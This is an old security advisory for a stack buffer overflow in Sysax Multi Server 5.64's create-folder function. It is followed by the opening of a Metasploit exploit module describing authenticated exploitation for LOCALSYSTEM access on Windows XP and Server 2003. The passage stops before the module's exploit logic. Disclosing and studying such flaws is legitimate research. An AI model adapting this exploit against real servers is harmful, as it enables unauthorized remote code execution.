Published: 2012-07-29
Updated: 2012-07-31
Affected systems:
sysax Sysax Multi Server 5.64
Description:
--------------------------------------------------------------------------------
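BUGTRAQ ID: 54713
Sysax Multi Server is an SSH2 and FTP server for the Windows platform.
Sysax Multi Server 5.64 and earlier versions contain a buffer overflow vulnerability in their implementation. An attacker can exploit this vulnerability to execute arbitrary code with elevated privileges.
<*Source: Matt Andreko
*>
Test method: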
--------------------------------------------------------------------------------
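WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Matt Andreko provided the following test method: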
require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sysax Multi Server 5.64 Create Folder BoF',
      'Description' => %q{
        This module exploits a stack buffer overflow in the create folder function
        in Sysax Multi Server 5.64. This issue was fixed in 5.66.
        You must have valid credentials to trigger the vulnerability. Your credentials
        must also have the create folder permission and the HTTP option has to be enabled.
        This module will log into the server, get your a SID token and then proceed to exploit
        the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
        XP SP3, and Server 2003 SP1-SP2.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
          'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
        ],
      'Version' => '$Revision:$',
      'References' =>
        [
          [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
          [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform' => 'win',
      'Payload' =>
        {
          'BadChars' => "\x00\x2F",
        },